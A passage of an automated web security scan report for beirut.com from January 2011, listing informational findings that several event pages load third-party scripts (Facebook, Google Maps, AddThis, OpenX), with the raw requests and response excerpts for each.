<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.703. http://www.beirut.com/ThingsToDo/Downtown/Mounzer-Kamanakache-Venus-of-the-Clouds/5910 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Downtown/Mounzer-Kamanakache-Venus-of-the-Clouds/5910

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Downtown/Mounzer-Kamanakache-Venus-of-the-Clouds/5910 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:07:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 69228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.704. http://www.beirut.com/ThingsToDo/Exhibitions/6382333962 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Exhibitions/6382333962

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Exhibitions/6382333962 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.705. http://www.beirut.com/ThingsToDo/Festivals/272910464 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Festivals/272910464

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Festivals/272910464 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.706. http://www.beirut.com/ThingsToDo/Gatherings/9274143605 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Gatherings/9274143605

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Gatherings/9274143605 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:10 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.707. http://www.beirut.com/ThingsToDo/Gemmayzeh/Karaoke-Night-at-Dice/1921 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Gemmayzeh/Karaoke-Night-at-Dice/1921

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Gemmayzeh/Karaoke-Night-at-Dice/1921 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.708. http://www.beirut.com/ThingsToDo/Hamra/Contact-Workshop-For-Beginners/6138 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Hamra/Contact-Workshop-For-Beginners/6138

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Hamra/Contact-Workshop-For-Beginners/6138 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:01:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.709. http://www.beirut.com/ThingsToDo/Hamra/One-Man-Nation-and-Kirdec-Live/6000 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Hamra/One-Man-Nation-and-Kirdec-Live/6000

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Hamra/One-Man-Nation-and-Kirdec-Live/6000 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:01:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.710. http://www.beirut.com/ThingsToDo/Hamra/Yasmina-Fayed/6158 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Hamra/Yasmina-Fayed/6158

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Hamra/Yasmina-Fayed/6158 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:01:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 115730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.711. http://www.beirut.com/ThingsToDo/Live-Music/560568055 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Live-Music/560568055

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Live-Music/560568055 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.712. http://www.beirut.com/ThingsToDo/Markets-and-Deals/0106299254 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Markets-and-Deals/0106299254

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Markets-and-Deals/0106299254 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.713. http://www.beirut.com/ThingsToDo/Monot/Ghada-Ghanem-Singing-with-The-Lebanese-Philharmonic-Orchestra/6044 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Monot/Ghada-Ghanem-Singing-with-The-Lebanese-Philharmonic-Orchestra/6044

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Monot/Ghada-Ghanem-Singing-with-The-Lebanese-Philharmonic-Orchestra/6044 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
